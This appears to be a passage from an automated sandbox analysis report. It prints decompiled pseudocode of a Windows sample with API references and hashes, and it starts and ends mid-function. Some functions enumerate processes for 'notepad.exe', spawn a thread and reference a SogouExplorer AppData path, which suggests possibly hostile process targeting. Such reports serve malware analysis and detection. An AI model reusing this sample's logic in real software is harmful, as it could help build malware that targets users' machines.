				_t139 = E0041F96F(_a4, _a8);
				_t238 = _t139;
				if(_t139 == 0) {
					_t232 = _a4;
					_t231 = E0040F78D(_a4);
					if(_t231 != 0) {
						_t221 =  *((intOrPtr*)(_t231 + 0x44));
						_a8 = _t221;
						if(_t221 != 0) {
							while(1) {
								_t9 = _t231 + 0x40; // 0x40
								_t232 = _t9;
								_t258 =  *(E0040B523( &_a8));
								_t224 =  *((intOrPtr*)(_t258 + 4));
								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
									break;
								}
								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
									if(_a8 != 0) {
										continue;
									} else {
									}
								} else {
									break;
								}
								goto L10;
							}
							_t238 = _t258;
						}
					}
				}
				L10:
				_t247 = 0;
				while(1) {
					_t238 = E0041F9C1(_t232, _a4, _t238, _a12);
					if(_t238 == 0) {
						break;
					}
					_t142 = E0041F46C(_t238);
					_pop(_t232);
					if(_t142 == 0) {
						L14:
						if(_t238 == 0) {
							L21:
							__eflags =  *(_t238 + 4);
							if( *(_t238 + 4) == 0) {
								E00415838(_t232);
								asm("int3");
								_push(0x28);
								E0042720D(E0043B16D, 0, _t238, _t247);
								_t146 = _a4;
								__eflags = _t146;
								if(_t146 != 0) {
									_v48 =  *((intOrPtr*)(_t146 + 0x20));
								} else {
									_v48 = _v48 & _t146;
								}
								_t240 = _a8;
								_t249 = _t240->message;
								_v32 = _t249;
								_v52 = GetFocus();
								_t149 = E00410E42(0, _t260, _t148);
								_t229 = 0x100;
								__eflags = _t249 - 0x100;
								_v24 = _t149;
								if(_t249 < 0x100) {
									L34:
									__eflags = _t249 + 0xfffffe00 - 9;
									if(_t249 + 0xfffffe00 > 9) {
										goto L56;
									} else {
										goto L35;
									}
								} else {
									__eflags = _t249 - 0x109;
									if(_t249 <= 0x109) {
										L35:
										__eflags = _t149;
										if(_t149 == 0) {
											L56:
											_t251 = 0;
											_v28 = 0;
											_t150 = E00410E42(_t229, _t260,  *_t240);
											_v44 = _v44 & 0;
											_v36 = _t150;
											_t152 = _v32 - _t229;
											__eflags = _t152;
											_v40 = 2;
											if(_t152 == 0) {
												_t153 = E0041F41F(_v36, _t240);
												_t232 =  *(_t240 + 8) & 0x0000ffff;
												__eflags = _t232 - 0x1b;
												if(__eflags > 0) {
													__eflags = _t232 - 0x25;
													if(_t232 < 0x25) {
														goto L75;
													} else {
														__eflags = _t232 - 0x26;
														if(_t232 <= 0x26) {
															_v44 = 1;
															goto L110;
														} else {
															__eflags = _t232 - 0x28;
															if(_t232 <= 0x28) {
																L110:
																_t171 = E0041F41F(_v24, _t240);
																__eflags = _t171 & 0x00000001;
																if((_t171 & 0x00000001) != 0) {
																	goto L75;
																} else {
																	__eflags = _v44;
																	_t232 = _a4;
																	_push(0);
																	if(_v44 == 0) {
																		_t172 = E004162A2(_t232);
																	} else {
																		_t172 = E00416254(_t232);
																	}
																	_t254 = _t172;
																	__eflags = _t254;
																	if(_t254 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t254 + 8);
																		if( *(_t254 + 8) != 0) {
																			_t232 = _a4;
																			E00415DFE(_a4, _t254);
																		}
																		__eflags =  *(_t254 + 4);
																		if( *(_t254 + 4) == 0) {
																			_t173 =  *_t254;
																			__eflags = _t173;
																			if(_t173 == 0) {
																				_t232 = _a4;
																				_t174 = E0041F4DD(_a4, _v24, _v44);
																			} else {
																				_t174 = E00410E42(_t229, _t260, _t173);
																			}
																			_t242 = _t174;
																			__eflags = _t242;
																			if(_t242 == 0) {
																				goto L75;
																			} else {
																				_t229 = 0;
																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
																				E0041F517(_t242);
																				__eflags =  *(_t254 + 8);
																				if( *(_t254 + 8) != 0) {
																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
																				}
																				goto L125;
																			}
																		} else {
																			_t232 =  *(_t254 + 4);
																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
																			goto L125;
																		}
																	}
																}
															} else {
																__eflags = _t232 - 0x2b;
																if(_t232 != 0x2b) {
																	goto L75;
																} else {
																	goto L97;
																}
															}
														}
													}
													goto L126;
												} else {
													if(__eflags == 0) {
														L103:
														_t243 = 0;
														__eflags = 0;
														goto L104;
													} else {
														__eflags = _t232 - 3;
														if(_t232 == 3) {
															goto L103;
														} else {
															__eflags = _t232 - 9;
															if(_t232 == 9) {
																__eflags = _t153 & 0x00000002;
																if((_t153 & 0x00000002) != 0) {
																	goto L75;
																} else {
																	_t188 = GetKeyState(0x10);
																	_t255 = _a4;
																	__eflags = _t188;
																	_t229 = 0 | _t188 < 0x00000000;
																	_t232 = _t255;
																	_t189 = E00415CBB(_t255, 0, _t188 < 0);
																	__eflags = _t189;
																	if(_t189 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t189 + 4);
																		if( *(_t189 + 4) == 0) {
																			_t190 =  *_t189;
																			__eflags = _t190;
																			if(_t190 == 0) {
																				_t232 = _t255;
																				_t191 = E0040C1AE(_t255, _v36, _t229);
																			} else {
																				_t191 = E00410E42(_t229, _t260, _t190);
																			}
																			_t244 = _t191;
																			__eflags = _t244;
																			if(_t244 != 0) {
																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
																				E0041F517(_t244);
																				E0041F6E1(_t229, _t232, _t260, _v24, _t244);
																				_pop(_t232);
																			}
																		} else {
																			_t195 =  *(_t189 + 4);
																			_t232 = _t195;
																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
																		}
																		goto L125;
																	}
																}
																goto L126;
															} else {
																__eflags = _t232 - 0xd;
																if(_t232 == 0xd) {
																	L97:
																	__eflags = _t153 & 0x00000004;
																	if((_t153 & 0x00000004) != 0) {
																		goto L75;
																	} else {
																		_t182 = E0041F4BC(_v24);
																		__eflags = _t182 & 0x00000010;
																		_pop(_t232);
																		if((_t182 & 0x00000010) == 0) {
																			_t183 = E0041F862(_a4);
																		} else {
																			_t251 = _v24;
																			_t232 = _t251;
																			_t183 = E004159FA(_t251);
																		}
																		_t243 = 0;
																		__eflags = _t251;
																		_v40 = _t183;
																		if(_t251 != 0) {
																			L105:
																			_t232 = _t251;
																			_t184 = E00415A74(_t251);
																			__eflags = _t184;
																			if(_t184 != 0) {
																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
																					goto L75;
																				} else {
																					_push(_t243);
																					_push(_t243);
																					_push(_t243);
																					_push(1);
																					_push(0xfffffdd9);
																					_push(_t251);
																					_v8 = _t243;
																					E00415AD1();
																					_v8 = _v8 | 0xffffffff;
																					goto L125;
																				}
																			} else {
																				MessageBeep(_t243);
																				goto L75;
																			}
																		} else {
																			L104:
																			_t251 = E0041F75C(_a4, _v40);
																			__eflags = _t251 - _t243;
																			if(_t251 == _t243) {
																				goto L75;
																			} else {
																				goto L105;
																			}
																		}
																	}
																	goto L126;
																} else {
																	goto L75;
																}
															}
														}
													}
												}
												goto L79;
											} else {
												_t198 = _t152;
												__eflags = _t198;
												if(_t198 == 0) {
													L62:
													_t199 = E0041F41F(_v36, _t240);
													__eflags = _v32 - 0x102;
													if(_v32 != 0x102) {
														L64:
														_t232 =  *(_t240 + 8) & 0x0000ffff;
														__eflags = _t232 - 9;
														if(_t232 != 9) {
															L66:
															__eflags = _t232 - 0x20;
															if(__eflags == 0) {
																goto L54;
															} else {
																_push(_t240);
																_t200 = E0041FB12(_t229, _t232, _t240, _t251, __eflags, _a4, _v36);
																__eflags = _t200;
																if(_t200 == 0) {
																	goto L75;
																} else {
																	_t201 =  *(_t200 + 4);
																	__eflags = _t201;
																	if(_t201 == 0) {
																		goto L75;
																	} else {
																		_t232 = _t201;
																		E00419A37(_t201, _t240);
																		L125:
																		_v28 = 1;
																	}
																}
																goto L79;
															}
														} else {
															__eflags = _t199 & 0x00000002;
															if((_t199 & 0x00000002) != 0) {
																goto L75;
															} else {
																goto L66;
															}
														}
													} else {
														__eflags = _t199 & 0x00000084;
														if((_t199 & 0x00000084) != 0) {
															goto L75;
														} else {
															goto L64;
														}
													}
												} else {
													__eflags = _t198 != 4;
													if(_t198 != 4) {
														L75:
														_t154 = _a4;
														__eflags =  *(_t154 + 0x3c) & 0x00001000;
														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
															__eflags = _t165;
															_v28 = _t165;
															if(_t165 != 0) {
																_t167 = E00410E42(_t229, _t260, GetFocus());
																__eflags = _t167 - _v24;
																if(_t167 != _v24) {
																	E0041F674(_t232, E00410E42(_t229, _t260, GetFocus()));
																	_pop(_t232);
																}
															}
														}
														L79:
														_t155 = IsWindow(_v52);
														__eflags = _t155;
														if(_t155 != 0) {
															E0041F6E1(_t229, _t232, _t260, _v24, E00410E42(_t229, _t260, GetFocus()));
															_t161 = IsWindow(_v48);
															__eflags = _t161;
															if(_t161 != 0) {
																E0041F88F(_a4, _v24, E00410E42(_t229, _t260, GetFocus()));
															}
														}
														_t156 = _v28;
													} else {
														__eflags = _v24;
														if(_v24 != 0) {
															L61:
															__eflags =  *(_t240 + 8) - 0x20;
															if( *(_t240 + 8) == 0x20) {
																goto L75;
															} else {
																goto L62;
															}
														} else {
															_t204 = GetKeyState(0x12);
															__eflags = _t204;
															if(_t204 >= 0) {
																goto L75;
															} else {
																goto L61;
															}
														}
													}
												}
											}
										} else {
											_t256 = _t149;
											while(1) {
												__eflags =  *(_t256 + 0x50);
												if( *(_t256 + 0x50) != 0) {
													break;
												}
												_t211 = E00410E42(_t229, _t260, GetParent( *(_t256 + 0x20)));
												__eflags = _t211 - _a4;
												if(_t211 != _a4) {
													_t256 = E00410E42(_t229, _t260, GetParent( *(_t256 + 0x20)));
													__eflags = _t256;
													if(_t256 != 0) {
														continue;
													}
												}
												break;
											}
											__eflags = _t256;
											if(_t256 == 0) {
												L45:
												__eflags = _v32 - 0x101;
												if(_v32 == 0x101) {
													L48:
													__eflags = _t256;
													if(_t256 == 0) {
														goto L55;
													} else {
														_t257 =  *(_t256 + 0x50);
														__eflags = _t257;
														if(_t257 == 0) {
															goto L55;
														} else {
															_t206 = _a8->wParam & 0x0000ffff;
															__eflags = _t206 - 0xd;
															if(_t206 != 0xd) {
																L52:
																__eflags = _t206 - 0x1b;
																if(_t206 != 0x1b) {
																	goto L55;
																} else {
																	__eflags =  *(_t257 + 0x84) & 0x00000002;
																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
																		goto L55;
																	} else {
																		goto L54;
																	}
																}
															} else {
																__eflags =  *(_t257 + 0x84) & 0x00000001;
																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
																	L54:
																	_t156 = 0;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _v32 - _t229;
													if(_v32 == _t229) {
														goto L48;
													} else {
														__eflags = _v32 - 0x102;
														if(_v32 != 0x102) {
															L55:
															_t240 = _a8;
															goto L56;
														} else {
															goto L48;
														}
													}
												}
											} else {
												_t207 =  *(_t256 + 0x50);
												__eflags = _t207;
												if(_t207 == 0) {
													goto L45;
												} else {
													__eflags =  *(_t207 + 0x58);
													if( *(_t207 + 0x58) == 0) {
														goto L45;
													} else {
														_t208 =  *(_t207 + 0x58);
														_t232 =  *_t208;
														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
														__eflags = _t209;
														if(_t209 != 0) {
															goto L45;
														} else {
															_t156 = _t209 + 1;
														}
													}
												}
											}
										}
									} else {
										goto L34;
									}
								}
								return E004272B2(_t156);
							} else {
								_t232 =  *(_t238 + 4);
								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
								__eflags = _t215 & 0x08000000;
								if((_t215 & 0x08000000) == 0) {
									goto L20;
								} else {
									goto L23;
								}
							}
						} else {
							_t216 =  *(_t238 + 4);
							if(_t216 == 0) {
								_t217 =  *_t238;
							} else {
								_t217 =  *(_t216 + 0x24);
							}
							if(_t217 == 0) {
								goto L21;
							} else {
								if(IsWindowEnabled(_t217) == 0) {
									L23:
									__eflags = _t238 - _v8;
									if(_t238 == _v8) {
										break;
									} else {
										__eflags = _v8;
										if(_v8 == 0) {
											_v8 = _t238;
										}
										_t247 = _t247 + 1;
										__eflags = _t247 - 0x200;
										if(_t247 < 0x200) {
											continue;
										} else {
											break;
										}
									}
								} else {
									L20:
									_t141 = _t238;
									L28:
									return _t141;
								}
							}
						}
					} else {
						_t232 = _a4;
						_t238 = E00415CBB(_a4, _t238, 0);
						if(_t238 == 0) {
							break;
						} else {
							goto L14;
						}
					}
					L126:
				}
				_t141 = 0;
				__eflags = 0;
				goto L28;
			}

APIs

GetFocus.USER32 ref: 0041FB65
IsWindowEnabled.USER32(?), ref: 0041FBC1
__EH_prolog3_catch.LIBCMT ref: 0041FC0F
GetFocus.USER32 ref: 0041FC2F
GetParent.USER32(?), ref: 0041FC7A
GetParent.USER32(?), ref: 0041FC8A
GetKeyState.USER32(00000012), ref: 0041FD48
IsDialogMessageA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041FDFC
GetFocus.USER32 ref: 0041FE0F
GetFocus.USER32 ref: 0041FE1C
IsWindow.USER32(?), ref: 0041FE34
GetFocus.USER32 ref: 0041FE40
IsWindow.USER32(?), ref: 0041FE56
GetFocus.USER32 ref: 0041FE5C
GetKeyState.USER32(00000010), ref: 0041FE85
MessageBeep.USER32(00000000), ref: 0041FF7C

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
String ID:
API String ID: 656273425-0
Opcode ID: 94b5b08f89b6f3d062ef76d0ef426a4059bfba038a8a02dcf2a8e9e49cc259a4
Instruction ID: 3ed7ecce9206c54ae5f97402f2c519618ca0fdc5251573b007a89f04c8d68588
Opcode Fuzzy Hash: 94b5b08f89b6f3d062ef76d0ef426a4059bfba038a8a02dcf2a8e9e49cc259a4
Instruction Fuzzy Hash: 68F19031A002059BDF20AF65D844AFF77A5AF44354F14413BE806A7262D778ECCBDBA9

Uniqueness

Uniqueness Score: -1.00%

Function 100038D7, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 137
threadCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E100038D7() {
				short _t46;
				short _t49;
				char _t52;
				void* _t68;
				intOrPtr _t80;
				void* _t90;
				signed int _t92;
				void* _t108;
				void* _t115;
				void* _t118;
				void* _t119;

				E100158AC(E1001A15F, _t119);
				memset(_t119 - 0x34c, 0, 0x10c);
				_t46 =  *0x10026984; // 0x0
				 *((short*)(_t119 - 0x240)) = _t46;
				_t92 = 0x3f;
				memset(_t119 - 0x23e, 0, _t92 << 2);
				asm("stosb");
				_t49 =  *0x10026988; // 0x0
				 *((short*)(_t119 - 0x140)) = _t49;
				memset(_t119 - 0x13e, 0, 0 << 2);
				asm("stosb");
				_t52 =  *0x1002698c; // 0x0
				 *(_t119 - 0x44c) = _t52;
				memset(_t119 - 0x44a, 0, 0 << 2);
				asm("stosb");
				E1000871F(_t119 - 0x20, _t119 - 0xf);
				 *((intOrPtr*)(_t119 - 4)) = 0;
				GetModuleFileNameA(0, _t119 - 0x44c, 0xff);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("\\", _t119 - 0xd, 0x3f, 0x3f, _t108, _t115, _t90);
				 *((char*)(_t119 - 4)) = 1;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t119 - 0x44c, _t119 - 0xe);
				 *((char*)(_t119 - 4)) = 2;
				E100034CB();
				 *((char*)(_t119 - 4)) = 1;
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t119 - 0x30, _t119 - 0x20, _t119 - 0x40);
				 *((char*)(_t119 - 4)) = 0;
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				_t68 = E10003CE7(_t119 - 0x20, E10003CD4(_t119 - 0x20) - 1);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				E10003C45(_t119 - 0x140, 0xff, _t68);
				E10003C45(_t119 - 0x240, 0xff, "notepad.exe");
				E10003C45(_t119 - 0x140, 0xff, _t119 - 0x140);
				E10003C45(_t119 - 0x34c, 0xff, _t119 - 0x240);
				_t80 = E100035B9(_t119 - 0x240);
				 *((intOrPtr*)(_t119 - 0x24c)) = E100035B9(_t119 - 0x140);
				 *((intOrPtr*)(_t119 - 0x248)) = _t80;
				CreateThread(0, 0, E10003820, _t119 - 0x34c, 0, 0);
				L1:
				_t118 = OpenProcess(0x1f0fff, 0, GetCurrentProcessId());
				SetPriorityClass(_t118, 0x80);
				CloseHandle(_t118);
				E1000B254();
				goto L1;
			}

0x100038dc
0x100038f9
0x100038fe
0x10003907
0x10003918
0x10003919
0x1000391b
0x1000391c
0x10003924
0x10003934
0x10003936
0x10003937
0x1000393f
0x1000394f
0x10003951
0x10003959
0x1000396c
0x1000396f
0x10003981
0x10003995
0x10003999
0x100039a2
0x100039af
0x100039ba
0x100039be
0x100039c7
0x100039ca
0x100039dd
0x100039e4
0x100039f3
0x10003a05
0x10003a19
0x10003a2d
0x10003a39
0x10003a4d
0x10003a64
0x10003a6a
0x10003a70
0x10003a83
0x10003a8b
0x10003a92
0x10003a98
0x00000000

APIs

__EH_prolog.LIBCMT ref: 100038DC
memset.MSVCRT ref: 100038F9
GetModuleFileNameA.KERNEL32(00000000,?,000000FF,?,?,750DCBB0,00000000), ref: 1000396F
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(10023508,?), ref: 10003981
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 10003999

Part of subcall function 100034CB: __EH_prolog.LIBCMT ref: 100034D0
Part of subcall function 100034CB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,000000FF,00000000), ref: 100034E6
Part of subcall function 100034CB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 10003503
Part of subcall function 100034CB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 1000351D
Part of subcall function 100034CB: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 10003526
Part of subcall function 100034CB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 10003538
Part of subcall function 100034CB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,6E4D5DF0), ref: 10003553
Part of subcall function 100034CB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 1000356C

??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 100039BE
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 100039CA
?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(-00000001), ref: 100039E4

Part of subcall function 100035B9: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 100035D2
Part of subcall function 100035B9: Process32First.KERNEL32(00000000,00000128), ref: 100035E6
Part of subcall function 100035B9: _strupr.MSVCRT ref: 100035F8
Part of subcall function 100035B9: _strupr.MSVCRT ref: 10003603
Part of subcall function 100035B9: strcmp.MSVCRT ref: 10003607
Part of subcall function 100035B9: Process32Next.KERNEL32 ref: 1000361A
Part of subcall function 100035B9: CloseHandle.KERNEL32(00000000,?,000000FF), ref: 10003624

CreateThread.KERNEL32 ref: 10003A6A
GetCurrentProcessId.KERNEL32 ref: 10003A70
OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 10003A7D
SetPriorityClass.KERNEL32(00000000,00000080), ref: 10003A8B
CloseHandle.KERNEL32(00000000), ref: 10003A92

Part of subcall function 1000B254: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,00000000,1000BA88), ref: 1000B26F
Part of subcall function 1000B254: CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,1000BA88), ref: 1000B276

Strings

notepad.exe, xrefs: 100039F8

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$CloseHandleV12@$??0?$basic_string@?substr@?$basic_string@CreateD@1@@H_prologProcessProcess32_strupr$?c_str@?$basic_string@?find@?$basic_string@?length@?$basic_string@?size@?$basic_string@ClassCurrentFileFirstModuleNameNextObjectOpenPrioritySingleSnapshotThreadToolhelp32Waitmemsetstrcmp
String ID: notepad.exe
API String ID: 2393490494-3945792927
Opcode ID: 9a2be371a0b0c80d3fe5ba7208018306faa98a79ed3f8295fd7a6ae6305020bc
Instruction ID: 44c73aa1c7d9246fecf4b4a074752bdf92a170cf5d3279c354f277f20b3823ef
Opcode Fuzzy Hash: 9a2be371a0b0c80d3fe5ba7208018306faa98a79ed3f8295fd7a6ae6305020bc
Instruction Fuzzy Hash: 3341027680152DABEB11DBA0CC88EEEB77CEF09344F444095F609E7151DB34AB89CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00421EB8, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 127
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00421EB8(void* __ebx, void* __edx, struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t31;
				signed int _t33;
				void* _t40;
				int _t46;
				void* _t51;
				intOrPtr _t52;
				signed int _t58;
				void* _t64;
				signed int* _t67;
				void* _t68;
				signed int _t69;
				signed int _t71;

				_t64 = __edx;
				_t51 = __ebx;
				if(_a4 != 0) {
					_push(_t68);
					_push(E0040D295);
					_t54 = 0x450cbc;
					_t69 = E0041720B(__ebx, 0x450cbc, 0, _t68, __eflags);
					__eflags = _t69;
					if(_t69 == 0) {
						E00415838(0x450cbc);
					}
					__eflags =  *(_t69 + 0x18);
					if(__eflags != 0) {
						__eflags = E00410E69(_t51, _t64, 0, _t69, __eflags, _a4);
						if(__eflags == 0) {
							_t54 =  *(_t69 + 0x18);
							E004118E2( *(_t69 + 0x18), __eflags, _a4);
							 *(_t69 + 0x18) = 0;
						}
					}
					_push(_t51);
					_t52 = _a8;
					__eflags = _t52 - 0x110;
					if(_t52 != 0x110) {
						__eflags = _t52 -  *0x452a4c; // 0x0
						if(__eflags == 0) {
							L25:
							SendMessageA(_a4, 0x111, 0xe146, 0);
							_t31 = 1;
							__eflags = 1;
							goto L26;
						}
						__eflags = _t52 - 0x111;
						if(_t52 != 0x111) {
							L12:
							__eflags = _t52 - 0xc000;
							if(__eflags < 0) {
								L22:
								_t31 = 0;
								goto L26;
							}
							_t71 = E00410E69(_t52, _t64, 0x110, _t69, __eflags, _a4);
							__eflags = _t71;
							if(_t71 == 0) {
								goto L22;
							}
							_t33 = E00416D15(_t71, "4�C");
							__eflags = _t33;
							if(_t33 == 0) {
								L16:
								__eflags = _t52 -  *0x452a40; // 0x0
								if(__eflags != 0) {
									__eflags = _t52 -  *0x452a44; // 0x0
									if(__eflags != 0) {
										__eflags = _t52 -  *0x452a3c; // 0x0
										if(__eflags != 0) {
											__eflags = _t52 -  *0x452a48; // 0x0
											if(__eflags != 0) {
												goto L22;
											}
											_t31 =  *((intOrPtr*)( *_t71 + 0x15c))();
											goto L26;
										}
										_t58 = _a16 >> 0x10;
										__eflags = _t58;
										 *((intOrPtr*)( *_t71 + 0x164))(_a12, _a16 & 0x0000ffff, _t58);
										goto L22;
									}
									_t19 = _t71 + 0x1c4; // 0x1c4
									_t67 = _t19;
									 *_t67 = _a16;
									_t31 =  *((intOrPtr*)( *_t71 + 0x160))();
									 *_t67 =  *_t67 & 0x00000000;
									goto L26;
								}
								_t31 =  *((intOrPtr*)( *_t71 + 0x15c))(_a16);
								goto L26;
							}
							_t40 = E00414508(_t71);
							__eflags =  *(_t40 + 0x34) & 0x00080000;
							if(( *(_t40 + 0x34) & 0x00080000) != 0) {
								goto L22;
							}
							goto L16;
						}
						__eflags = _a12 - 0x40e;
						if(_a12 == 0x40e) {
							goto L25;
						}
						goto L12;
					} else {
						 *0x452a3c = RegisterClipboardFormatA("commdlg_LBSelChangedNotify");
						 *0x452a40 = RegisterClipboardFormatA("commdlg_ShareViolation");
						 *0x452a44 = RegisterClipboardFormatA("commdlg_FileNameOK");
						 *0x452a48 = RegisterClipboardFormatA("commdlg_ColorOK");
						 *0x452a4c = RegisterClipboardFormatA("commdlg_help");
						_t46 = RegisterClipboardFormatA("commdlg_SetRGBColor");
						_push(_a16);
						 *0x452a50 = _t46;
						_push(_a12);
						_t31 = E0040C03D(_t52, _t54, _t64, 0x110, RegisterWindowMessageA, _a4, 0x110);
						L26:
						return _t31;
					}
				}
				return 0;
			}

APIs

RegisterClipboardFormatA.USER32 ref: 00421F1C
RegisterClipboardFormatA.USER32 ref: 00421F28
RegisterClipboardFormatA.USER32 ref: 00421F34
RegisterClipboardFormatA.USER32 ref: 00421F40
RegisterClipboardFormatA.USER32 ref: 00421F4C
RegisterClipboardFormatA.USER32 ref: 00421F58

Strings

commdlg_FileNameOK, xrefs: 00421F2A
4C, xrefs: 00421FAE
commdlg_SetRGBColor, xrefs: 00421F4E
commdlg_ColorOK, xrefs: 00421F36
commdlg_LBSelChangedNotify, xrefs: 00421F17
commdlg_help, xrefs: 00421F42
commdlg_ShareViolation, xrefs: 00421F1E

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardFormatRegister
String ID: 4C$commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
API String ID: 1228543026-2642033463
Opcode ID: c919d7e6f93383ac7391350e7a2407e9c742391625a53804e92728ed1ae0abcd
Instruction ID: 114c3e48c0948abe4f993226d9b1e8b8b785eaa0f0e38d3170b5998e073e7822
Opcode Fuzzy Hash: c919d7e6f93383ac7391350e7a2407e9c742391625a53804e92728ed1ae0abcd
Instruction Fuzzy Hash: C741D130B00725ABCB369F21EE84AAA3BA1FB54351F60042BF90557261D7B9DC51CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 10006023, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 59
sleepCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E10006023(void* __ecx) {
				void* _t30;
				void* _t45;
				void* _t47;

				E100158AC(E1001A304, _t45);
				 *((intOrPtr*)(_t45 - 0x10)) = _t47 - 0x110;
				L10015818();
				E1000490A();
				 *0x100273bc(0, _t45 - 0x11c, 7, 0, "SogouExplorer.exe", __ecx);
				L10015842();
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				_push(0x5c);
				_push(2);
				_push(_t45 - 0x11c);
				_push(_t45 - 0x14);
				L1001583C();
				_push(_t45 - 0x14);
				_t30 = _t45 - 0x18;
				_push("C:\\Users\\");
				_push(_t30);
				L10015836();
				_push("\\AppData\\Roaming\\SogouExplorer");
				_push(_t30);
				 *(_t45 - 4) = 1;
				_push(_t45 - 0x10);
				L10015830();
				 *(_t45 - 4) = 3;
				L1001580C();
				Sleep(0x3e8);
				_push(E1000865D(_t45 - 0x10));
				E10005B32();
